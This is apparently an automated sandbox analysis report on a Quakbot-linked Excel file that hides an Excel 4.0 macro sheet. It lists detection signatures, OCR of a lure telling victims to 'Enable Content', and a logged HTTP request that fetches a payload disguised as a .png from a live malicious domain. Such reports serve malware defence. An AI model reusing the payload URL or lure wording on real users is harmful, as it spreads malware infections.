Loading ...

Play interactive tourEdit tour

Analysis Report Complaint-Copy_1984632811_11102020.xls

Overview

General Information

Sample Name:Complaint-Copy_1984632811_11102020.xls
Analysis ID:321328
MD5:3923517a84aa5cda58fec80a26dfbfac
SHA1:96339ae67e0634cabaefe3a9f13b0dd29f128781
SHA256:5958d4456b39343d02e0a90b156112ff2f42ab2f94fb453f722b8c4f1f91b1c4

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Found abnormal large hidden Excel 4.0 Macro sheet
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2464 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Complaint-Copy_1984632811_11102020.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x780d:$e1: Enable Editing
  • 0x7858:$e1: Enable Editing
  • 0x7876:$e2: Enable Content
Complaint-Copy_1984632811_11102020.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x8ea2:$s1: Excel
  • 0x9f13:$s1: Excel
  • 0x374e:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
Complaint-Copy_1984632811_11102020.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Antivirus / Scanner detection for submitted sampleShow sources
    Source: Complaint-Copy_1984632811_11102020.xlsAvira: detected
    Antivirus detection for URL or domainShow sources
    Source: http://int.boogieapparel.co.id/jvkuykqpn/4574557.pngAvira URL Cloud: Label: malware
    Multi AV Scanner detection for submitted fileShow sources
    Source: Complaint-Copy_1984632811_11102020.xlsReversingLabs: Detection: 18%

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Source: global trafficDNS query: name: int.boogieapparel.co.id
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.253.212.59:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 103.253.212.59:80
    Source: global trafficHTTP traffic detected: GET /jvkuykqpn/4574557.png HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: int.boogieapparel.co.idConnection: Keep-Alive
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
    Source: global trafficHTTP traffic detected: GET /jvkuykqpn/4574557.png HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: int.boogieapparel.co.idConnection: Keep-Alive
    Source: unknownDNS traffic detected: queries for: int.boogieapparel.co.id

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Document image extraction number: 2Screenshot OCR: Enable Editing' from the yellow bar above Once You have Enable Editing, please click 'Enable Conte
    Source: Document image extraction number: 2Screenshot OCR: Enable Content' from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andr
    Source: Document image extraction number: 8Screenshot OCR: Enable Editing' from the yellow bar above @Once You have Enable Editing, please click 'Enable Cont
    Source: Document image extraction number: 8Screenshot OCR: Enable Content' from the yellow bar above WHYICANNOT OPEN THIS DOCUMENT? wYou are using IDS or An
    Source: Screenshot number: 4Screenshot OCR: Enable Editing, please click 'Enable Content' 15 1 from the yellow bar above 16 CI .I. 'r 17 "
    Source: Screenshot number: 4Screenshot OCR: Enable Content' 15 1 from the yellow bar above 16 CI .I. 'r 17 " I WHY I CANNOT OPEN THIS DOCUM
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: Complaint-Copy_1984632811_11102020.xlsInitial sample: Sheet size: 41496
    Source: Complaint-Copy_1984632811_11102020.xlsOLE indicator, VBA macros: true
    Source: Complaint-Copy_1984632811_11102020.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
    Source: Complaint-Copy_1984632811_11102020.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: classification engineClassification label: mal84.expl.evad.winXLS@1/5@1/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\B4DE0000Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCDD9.tmpJump to behavior
    Source: Complaint-Copy_1984632811_11102020.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: Complaint-Copy_1984632811_11102020.xlsReversingLabs: Detection: 18%
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: Complaint-Copy_1984632811_11102020.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting11Path InterceptionPath InterceptionMasquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting11Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Complaint-Copy_1984632811_11102020.xls19%ReversingLabsDocument-Office.Backdoor.Quakbot
    Complaint-Copy_1984632811_11102020.xls100%AviraXF/Agent.B2

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    int.boogieapparel.co.id4%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://int.boogieapparel.co.id/jvkuykqpn/4574557.png4%VirustotalBrowse
    http://int.boogieapparel.co.id/jvkuykqpn/4574557.png100%Avira URL Cloudmalware

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    int.boogieapparel.co.id
    103.253.212.59
    truefalseunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://int.boogieapparel.co.id/jvkuykqpn/4574557.pngtrue
    • 4%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPDomainCountryFlagASNASN NameMalicious
    103.253.212.59
    unknownIndonesia
    58487RUMAHWEB-AS-IDRumahwebIndonesiaCVIDfalse

    General Information

    Joe Sandbox Version:31.0.0 Red Diamond
    Analysis ID:321328
    Start date:20.11.2020
    Start time:20:54:39
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 3m 51s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:Complaint-Copy_1984632811_11102020.xls
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:4
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal84.expl.evad.winXLS@1/5@1/1
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .xls
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    Warnings:
    Show All
    • Exclude process from analysis (whitelisted): dllhost.exe

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASN

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    RUMAHWEB-AS-IDRumahwebIndonesiaCVIDlink.exeGet hashmaliciousBrowse
    • 103.253.212.238
    41632852441.xlsGet hashmaliciousBrowse
    • 103.247.9.181
    41632852441.xlsGet hashmaliciousBrowse
    • 103.247.9.181
    4793764614.xlsGet hashmaliciousBrowse
    • 103.247.9.181
    41342317068.xlsGet hashmaliciousBrowse
    • 103.247.9.181
    4793764614.xlsGet hashmaliciousBrowse
    • 103.247.9.181
    41342317068.xlsGet hashmaliciousBrowse
    • 103.247.9.181
    https://farahcarpets.co.id/css/4tO8EFTAA6BpVIbXFlshLDT/Get hashmaliciousBrowse
    • 103.247.10.240
    http://alifmedical.shopGet hashmaliciousBrowse
    • 103.253.214.59
    e-statement 00800028.exeGet hashmaliciousBrowse
    • 103.253.212.224
    Account Statement.exeGet hashmaliciousBrowse
    • 103.253.212.224
    Standard Chartered.exeGet hashmaliciousBrowse
    • 103.253.212.224
    linksco.exeGet hashmaliciousBrowse
    • 103.253.212.238
    SecuriteInfo.com.Trojan.PWS.Siggen2.55747.31377.exeGet hashmaliciousBrowse
    • 103.247.10.55
    Shipping documents .docGet hashmaliciousBrowse
    • 103.247.10.55
    linkercre.exeGet hashmaliciousBrowse
    • 103.247.10.55
    cjwe.exeGet hashmaliciousBrowse
    • 103.247.10.55
    Contract .docGet hashmaliciousBrowse
    • 103.247.8.223
    41508013809.xlsGet hashmaliciousBrowse
    • 103.247.9.181
    41508013809.xlsGet hashmaliciousBrowse
    • 103.247.9.181

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Temp\34DE0000
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):25953
    Entropy (8bit):7.554142004148482
    Encrypted:false
    SSDEEP:384:DzntMuyIUr/gcY7MsMf4FTjv/CBKf1WVcBP+g378aoVT0QNuzWKPqTk/m6RV:DztJjcoZMuJb/jvBP+g3AW+u7qIpRV
    MD5:C785AEAD6251961971CEE65E626BBDC2
    SHA1:06C35548680A7DBF238D39D580ADBF7CE394004B
    SHA-256:1CF6E8BB5321DD194BE4EFBBCD4E1679F693A8095F18452B607B9F02EB328D4D
    SHA-512:209DED3255E6CDD0663B41F028781872169B5880A350225D15BF1BBC7AE637595D705165E519D97CACCCCE8D7FC692CF03B424672080B26CF8A200B30BFF4077
    Malicious:false
    Reputation:low
    Preview: .U.n.0....?......(..r.izl.$..19..s..$..w(+jk8V...E......3...]<c...]U3V..N*........+b.+A;.5.bd7......X....)...G..X9..vV..H....A..A~=.}...6.)s......I..nC.;'KeYq...K....J@"....=..VJ.t...u.}@..ELFW>(R.......?..m...L....#.......P..+%...K......v.=.'50(..=......7....^:.....0M,q#PW]b......F..e_..Q.w......'9.\IG<....|t.M.d.....r?...=}.?..G...yw}....4 ...x.jw.c.-.............!..d...x..=...-n[:.N...{L...}p>. .8...........p.....A...t...y.J...y7..........PK..........!...M.............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Complaint-Copy_1984632811_11102020.LNK
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Sat Nov 21 03:55:39 2020, atime=Sat Nov 21 03:55:39 2020, length=45568, window=hide
    Category:dropped
    Size (bytes):2268
    Entropy (8bit):4.497492906166144
    Encrypted:false
    SSDEEP:48:82k/XT3InxooG1oo8kQh22k/XT3InxooG1oo8kQ/:82k/XLInjkQh22k/XLInjkQ/
    MD5:0D9742AAF80F067F34233ADE5716AC4B
    SHA1:0CE3CB8C078ED22B9B0FD96379BB42C7484D404A
    SHA-256:7A4600B8FA1D6D20E0EEA0F481C72A4415AE234EC635F0267A110A09C00868CB
    SHA-512:417904ABB4CC242CDF1F6D8692730B3C19B42BC03244A13E5DF43A462F46B2A2CF72C51EE778ADC197CA4AD6F0F533494F5904B44F581119FBE6FFF255028234
    Malicious:false
    Reputation:low
    Preview: L..................F.... ........{..OO.........................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....uQ.& .COMPLA~1.XLS..z.......Q.y.Q.y*...8.....................C.o.m.p.l.a.i.n.t.-.C.o.p.y._.1.9.8.4.6.3.2.8.1.1._.1.1.1.0.2.0.2.0...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\114127\Users.user\Desktop\Complaint-Copy_1984632811_11102020.xls.=.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.o.m.p.l.a.i.n.t.-.C.o.p.y._.1.9.8.4.6.3.2.8.1.1._.1.1.1.0.2.0.2.0...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sat Nov 21 03:55:39 2020, atime=Sat Nov 21 03:55:39 2020, length=12288, window=hide
    Category:dropped
    Size (bytes):867
    Entropy (8bit):4.466118142780456
    Encrypted:false
    SSDEEP:12:85QDLgXg/XAlCPCHaXgzB8IB/YFX+Wnicvb+ObDtZ3YilMMEpxRljK5TdJP9TdJ2:85M/XTwz6I0YeSCDv3qkrNru/
    MD5:6144840846E5E76BB07B02E9C033D2E9
    SHA1:C20490D6089C0899D552FB22206F28E5B8A88EAF
    SHA-256:56AE41A0C09140E3A8E833CF6495414D3E889F245BED94B8112FFAB77CA45082
    SHA-512:F852FFBC712941AD9CE1BCBED1F0E2BE40C4728D9F9C5ACAB2B6E908A90614A739ACBC4887FE151CFE25F8EF6B9E91B4CF0502599E808CD54548DA27BAB3C72C
    Malicious:false
    Reputation:low
    Preview: L..................F...........7G..OO.....OO......0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....uQ.&..Desktop.d......QK.XuQ.&*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\114127\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......114127..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):155
    Entropy (8bit):4.782840932348737
    Encrypted:false
    SSDEEP:3:oyBVomMYlI9aQl+1lI9aQlmMYlI9aQlv:dj6YlunalunxYlun1
    MD5:D16F8EEA1281B0FD6372F23858B85FD5
    SHA1:28FD118905CFE08FB64D8B5C4B514DD91BD0B02E
    SHA-256:23C1D657B722A1C30C322D4E749280395A777BCB136F5C86CAC7E73574A2AD1A
    SHA-512:D6A4F15B4046B635E1BEA0353CD95AF8B10C515487A6429988A0F2EDB821506A479F5E82DEF38D604362618000816E4AA9A83FC593792FA6CA06D71C4923696F
    Malicious:false
    Reputation:low
    Preview: Desktop.LNK=0..[xls]..Complaint-Copy_1984632811_11102020.LNK=0..Complaint-Copy_1984632811_11102020.LNK=0..[xls]..Complaint-Copy_1984632811_11102020.LNK=0..
    C:\Users\user\Desktop\B4DE0000
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:Applesoft BASIC program data, first line number 16
    Category:dropped
    Size (bytes):71110
    Entropy (8bit):6.191934771599683
    Encrypted:false
    SSDEEP:1536:hXcKoSsxz1PDZLDZjlbR868O8KL5L+WxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAFr:hXcKoSsxzNDZLDZjlbR868O8KL5L+WxX
    MD5:013438CF88100CA615E769D70A855B36
    SHA1:83DBCEC2962BB8D9C4C4C874985D002F006F28EB
    SHA-256:54AC1E4890DF5190099A0DAC0E662C0B8C1638196334A0C9BFFA3B70D9B784D0
    SHA-512:B9EA45517783006A4A9F73C6E9D80C4C7957CA9122E2BC1936339054C3223B9E9BBDBD698D7FBC032EF540DE64C24714081EF05AE323129965B3212C10E00942
    Malicious:false
    Reputation:low
    Preview: ........g2.........................\.p.... B.....a.........=.................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.........

    Static File Info

    General

    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 11 08:23:49 2020, Security: 0
    Entropy (8bit):5.312075712679437
    TrID:
    • Microsoft Excel sheet (30009/1) 78.94%
    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
    File name:Complaint-Copy_1984632811_11102020.xls
    File size:45568
    MD5:3923517a84aa5cda58fec80a26dfbfac
    SHA1:96339ae67e0634cabaefe3a9f13b0dd29f128781
    SHA256:5958d4456b39343d02e0a90b156112ff2f42ab2f94fb453f722b8c4f1f91b1c4
    SHA512:bbab71efef86a2798308e62eb1fc9c05c6605fa77a24396e872b92a87d5606945deca7a42911ce803133b00ac50ed8599f7768f2d406811329333cdaf71a74d2
    SSDEEP:768:nucKoSsxz1PDZLDZjlbR868O8KldzH3xz7uDphYHceXVhca+fMHLtyeGxcbB8OUk:nucKoSsxz1PDZLDZjlbR868O8KlVH3FH
    File Content Preview:........................>.......................W...........................V..................................................................................................................................................................................

    File Icon

    Icon Hash:e4eea286a4b4bcb4

    Static OLE Info

    General

    Document Type:OLE
    Number of OLE Files:1

    OLE File "Complaint-Copy_1984632811_11102020.xls"

    Indicators

    Has Summary Info:True
    Application Name:Microsoft Excel
    Encrypted Document:False
    Contains Word Document Stream:False
    Contains Workbook/Book Stream:True
    Contains PowerPoint Document Stream:False
    Contains Visio Document Stream:False
    Contains ObjectPool Stream:
    Flash Objects Count:
    Contains VBA Macros:True

    Summary

    Code Page:1251
    Author:
    Last Saved By:
    Create Time:2006-09-16 00:00:00
    Last Saved Time:2020-11-11 08:23:49
    Creating Application:Microsoft Excel
    Security:0

    Document Summary

    Document Code Page:1251
    Thumbnail Scaling Desired:False
    Contains Dirty Links:False
    Shared Document:False
    Changed Hyperlinks:False
    Application Version:917504

    Streams

    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
    General
    Stream Path:\x5DocumentSummaryInformation
    File Type:data
    Stream Size:4096
    Entropy:0.363455520341
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . . 1 . . . . . . . . . 3 . . . . . L i v e . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 b5 00 00 00 02 00 00 00 e3 04 00 00
    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
    General
    Stream Path:\x5SummaryInformation
    File Type:data
    Stream Size:4096
    Entropy:0.250004009968
    Base64 Encoded:False
    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 35753
    General
    Stream Path:Workbook
    File Type:Applesoft BASIC program data, first line number 16
    Stream Size:35753
    Entropy:6.21957904962
    Base64 Encoded:True
    Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . .
